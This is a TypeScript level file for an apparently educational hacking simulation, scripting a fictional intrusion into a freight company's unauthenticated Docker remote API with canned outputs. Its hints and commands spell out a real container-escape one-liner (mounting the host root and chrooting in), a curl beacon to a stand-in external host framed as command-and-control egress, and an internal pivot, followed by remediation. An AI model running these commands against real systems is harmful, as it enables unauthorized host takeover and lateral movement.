import type { ChainDef } from "../../types";
import { match, cmd } from "../../engine";

const IP = "198.51.100.40";

export const mediumLevel7: ChainDef = {
  id: "medium-7",
  difficulty: "medium",
  order: 7,
  points: 110,
  title: "Open Socket",
  codename: "OPERATION OPEN SOCKET",
  summary: "A container platform's remote control socket, left open with no authentication, is a remote control socket for the whole host underneath it.",
  briefing: [
    "Cascadia Freight Exchange runs a set of containerized microservices for regional freight",
    "brokers out of the Columbia River Gorge. Convenient for their small ops team — spin up a",
    "container, ship a change, move on.",
    "",
    "One of those containers' remote management APIs was left reachable with no authentication at",
    "all. Find out what that actually lets you do, and how far past the container it goes.",
  ],
  debrief: [
    "root cause: the container platform's remote API was exposed on the network with no TLS and no",
    "authentication, allowing anyone who could reach it to launch a new, fully privileged container",
    "with the host filesystem mounted inside it — trivial container escape (CWE-284). From the host,",
    "internal network segments meant to be unreachable from the outside were fully reachable.",
    "",
    "CASCADIA FREIGHT EXCHANGE: SECURED.",
  ],
  nodes: [
    {
      id: "cascadia",
      org: "Cascadia Freight Exchange",
      city: "Cascade Locks",
      state: "OR",
      coords: { x: 14.9, y: 12.9 },
      ip: IP,
      tagline: "Regional freight brokerage — containerized microservices",
      briefing: [
        "TARGET: Cascadia Freight Exchange container platform",
        `IP: ${IP}`,
        "KNOWN: containerized services, remote management API reachability unconfirmed.",
        "",
        "Find out whether that API requires anything at all to use.",
      ],
      initialPrompt: "op@breachline:~$",
      motd: [
        "session notes.txt:",
        "  \"Small ops team, containers everywhere. Nobody remembers turning on auth for the remote",
        "   API — mostly because nobody ever did.\" — dispatch",
      ],
      objectives: [
        { id: "recon", label: "Enumerate open services on the target", tactic: "Reconnaissance" },
        { id: "identify", label: "Confirm the container remote API is reachable with no authentication", tactic: "Discovery", requires: ["recon"] },
        { id: "escape", label: "Launch a privileged container mounting the host filesystem", tactic: "Privilege Escalation", requires: ["identify"] },
        { id: "c2check", label: "Confirm outbound egress isn't restricted from the host", tactic: "Command and Control", requires: ["escape"] },
        { id: "loot", label: "Recover proof of host-level access", tactic: "Collection", requires: ["c2check"] },
        { id: "pivot", label: "Reach an internal-only admin panel from the host's network segment", tactic: "Lateral Movement", requires: ["loot"] },
        { id: "secure", label: "Require authentication on the container API and segment the network", tactic: "Remediation", requires: ["pivot"] },
      ],
      hints: [
        "Recon first — `nmap -sV <ip>`. A container platform's remote API usually runs on a distinct port from the regular web traffic.",
        "If the API needs no credentials, listing the running containers should just work — `docker -H tcp://<ip>:2375 ps`.",
        "A container platform with no auth will happily run whatever you ask it to. Mounting the host's root filesystem into a fresh container and getting a shell inside it gets you the host, not just the container — `docker -H tcp://<ip>:2375 run -v /:/host -it alpine chroot /host sh`.",
        "From a host shell, check whether outbound connections are actually filtered — reach out to an external listener and see if it answers.",
        "Look for a proof file at the host's root once you're in.",
        "Check what internal network this host actually sits on — `cat /etc/hosts` or similar — and see what else is reachable only from here.",
      ],
      debrief: [
        "root cause: the container platform's remote API (port 2375) had no TLS and no authentication",
        "configured, so any network-reachable client could create and run a fully privileged container",
        "with the host's root filesystem mounted inside it — a direct path from 'reach the API' to 'own",
        "the host.'",
        "fix applied: remote API now requires mutual TLS authentication, host firewalled to only the",
        "orchestration control plane, network segmented from internal-only systems.",
      ],
      commands: [
        cmd({
          id: "nmap",
          tool: "nmap",
          requires: [IP],
          help: "nmap -sV <ip>         — service/version scan",
          run: () => ({
            completesObjective: "recon",
            tone: "success",
            setsFlags: ["scanned"],
            output: [
              "PORT     STATE SERVICE VERSION",
              "22/tcp   open  ssh     OpenSSH 8.9p1",
              "2375/tcp open  docker  Docker remote API (no TLS)",
              "",
              "Nmap done: 1 IP address (1 host up) scanned in 4.05 seconds",
            ],
          }),
        }),
        cmd({
          id: "docker-ps",
          tool: "docker",
          requires: ["2375", "ps"],
          help: "docker -H tcp://<ip>:2375 ps      — list running containers, no auth required",
          requiresObjectives: ["recon"],
          run: () => ({
            completesObjective: "identify",
            tone: "success",
            setsFlags: ["docker_known"],
            output: [
              "CONTAINER ID   IMAGE            STATUS         PORTS",
              "9a3f21bc0e11   cascadia/quotes  Up 14 days     0.0.0.0:8081->8081/tcp",
              "c412ab0091fe   cascadia/dispatch Up 14 days    0.0.0.0:8082->8082/tcp",
              "",
              "[+] the remote API answered with zero authentication of any kind.",
            ],
          }),
        }),
        cmd({
          id: "docker-escape",
          tool: "docker",
          requires: ["2375", "run", "-v /:/host", "chroot"],
          help: 'docker -H tcp://<ip>:2375 run -v /:/host -it alpine chroot /host sh',
          requiresFlags: ["docker_known"],
          run: () => ({
            completesObjective: "escape",
            tone: "success",
            setsFlags: ["host_shell"],
            promptAfter: "root@cascadia-host:~#",
            output: [
              "[+] container launched with the host root filesystem mounted at /host",
              "[+] chroot into /host succeeded — this is the host, not a container, and it's root.",
              "",
              "[!] an unauthenticated management API turned into full host root in one command.",
            ],
          }),
        }),
        cmd({
          id: "c2-check",
          tool: "curl",
          requires: ["assessment-team.example", "beacon"],
          help: "curl https://assessment-team.example/beacon      — test outbound egress from the host",
          requiresFlags: ["host_shell"],
          run: () => ({
            completesObjective: "c2check",
            tone: "warn",
            setsFlags: ["egress_confirmed"],
            output: [
              "beacon received by assessment-team.example",
              "",
              "[!] outbound HTTPS egress is not filtered from this host. in a real incident, this is",
              "    exactly the path a command-and-control channel would use to phone home.",
            ],
          }),
        }),
        cmd({
          id: "cat-proof",
          tool: "cat",
          requires: ["proof.txt"],
          help: "cat /host/root/proof.txt",
          requiresFlags: ["egress_confirmed"],
          run: () => ({
            completesObjective: "loot",
            tone: "success",
            note: "Cascadia Freight Exchange — proof.txt: 5f4dcc3b5aa765d61d8327deb882cf99",
            output: ["5f4dcc3b5aa765d61d8327deb882cf99"],
          }),
        }),
        cmd({
          id: "pivot-internal",
          tool: "curl",
          requires: ["10.20.0.15", "admin"],
          help: "curl http://10.20.0.15/admin      — reach an internal-only host from this network segment",
          requiresObjectives: ["loot"],
          run: () => ({
            completesObjective: "pivot",
            tone: "success",
            note: "Cascadia Freight Exchange — internal fleet-tracking admin panel (10.20.0.15) reachable only from the container host's network segment",
            output: [
              "HTTP/1.1 200 OK",
              "",
              "<title>Fleet Tracking — Internal Admin</title>",
              "",
              "[!] this admin panel was never meant to be reachable from outside the internal network —",
              "    but it's reachable fine from the host you just took over.",
            ],
          }),
        }),
        {
          id: "secure",
          tool: "secure",
          match: match.startsWith("secure system", "secure", "remediate"),
          help: "secure system         — require auth on the container API and segment the network",
          requiresObjectives: ["pivot"],
          deniedOutput: ["confirm how far this actually reaches before you file the fix."],
          run: () => ({
            completesObjective: "secure",
            tone: "success",
            output: [
              "[+] container remote API now requires mutual TLS authentication",
              "[+] host firewalled to only the orchestration control plane",
              "[+] network segmented from internal-only systems, fleet-tracking admin access restricted",
              "",
              "CASCADIA FREIGHT EXCHANGE: SECURED",
            ],
          }),
        },
      ],
    },
  ],
};
